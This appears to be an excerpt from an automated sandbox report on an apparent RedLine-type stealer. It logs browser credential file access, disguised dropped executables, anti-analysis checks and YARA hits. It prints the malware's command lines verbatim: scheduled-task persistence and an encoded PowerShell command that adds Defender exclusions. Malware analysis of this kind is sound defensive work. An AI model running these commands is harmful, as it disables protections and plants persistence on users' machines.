NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758f1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Dec. 11, 2023, 7:16 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 9927581696 root_path: C:\Users\test22\AppData\Roaming\temp total_number_of_bytes: 0	1	1	0

Steals private information from local Internet browsers (7 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (9 events)

file	C:\ProgramData\Dllhost\dllhost.exe
file	C:\Users\test22\AppData\Roaming\temp\KillDuplicate.cmd
file	C:\Users\test22\AppData\Local\Temp\conhost.exe
file	C:\Users\test22\AppData\Local\Temp\svchost.exe
file	C:\Users\test22\AppData\Roaming\temp\7z.dll
file	C:\Users\test22\AppData\Roaming\temp\main.bat
file	C:\Users\test22\AppData\Roaming\temp\7z.exe
file	C:\ProgramData\Dllhost\winlogson.exe
file	C:\Users\test22\AppData\Roaming\temp\extracted\Installer.exe

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Dec. 11, 2023, 7:16 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\ filepath: C:\ProgramData\Dllhost\	1	1	0
SetFileAttributesW Dec. 11, 2023, 7:16 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\HostData\ filepath: C:\ProgramData\HostData\	1	1	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (8 events)

cmdline	C:\Users\test22\AppData\Local\Temp\svchost.exe
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"C:\Users\test22\AppData\Local\Temp\svchost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /C powershell -EncodedCommand "PAAjAEgAbgBOAEcAYwBVADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAYwAwAFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANgAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQANgBDAHMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	powershell -EncodedCommand "PAAjAEgAbgBOAEcAYwBVADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAYwAwAFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANgAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQANgBDAHMAIwA+AA=="
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\conhost.exe
file	C:\Users\test22\AppData\Local\Temp\svchost.exe
file	C:\Users\test22\AppData\Roaming\temp\7z.exe
file	C:\Users\test22\AppData\Roaming\temp\Installer.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Roaming\temp\Installer.exe
file	C:\Users\test22\AppData\Local\Temp\conhost.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Dec. 11, 2023, 7:16 p.m.	show_type: 0 filepath_r: main.bat parameters: /S filepath: main.bat	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Dec. 11, 2023, 7:15 p.m.	flags: 1158 family: 0	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (33 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Dec. 11, 2023, 7:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (45 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	task schedule	rule	schtasks_Zero
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names.	rule	vmdetect_misc
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	RedLine stealer	rule	RedLine_Stealer_m_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000008c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: 7-Zip base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: AddressBook base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: Adobe AIR base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: Connection Manager base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: DirectDrawEx base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: EditPlus base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: Fontcore base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: Google Chrome base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: IE40 base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: IE4Data base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: IE5BAKEX base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: IEData base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: MobileOptionPack base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: Office15.PROPLUSR base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: SchedulingAgent base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: WIC base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
